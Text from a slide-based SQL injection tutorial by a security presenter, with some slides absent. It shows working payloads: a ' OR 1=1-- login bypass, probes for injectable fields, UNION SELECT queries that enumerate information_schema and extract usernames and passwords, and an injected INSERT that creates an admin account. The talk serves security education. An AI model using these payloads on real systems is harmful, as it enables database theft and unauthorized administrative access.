1. How Did I Steal Your Database Mostafa Siraj Application Security Expert
2. DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
4. What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
5. What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
6. SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
7. FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
8. SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
9. SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
10. SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
11. This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
12. Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
13. Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
14. Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
15. Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
16. Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
29. The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
30. The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
31. The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
32. The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
33. The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
34. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
43. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
44. 2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
48. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
49. 3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
51. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
52. Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
53. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
68. Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)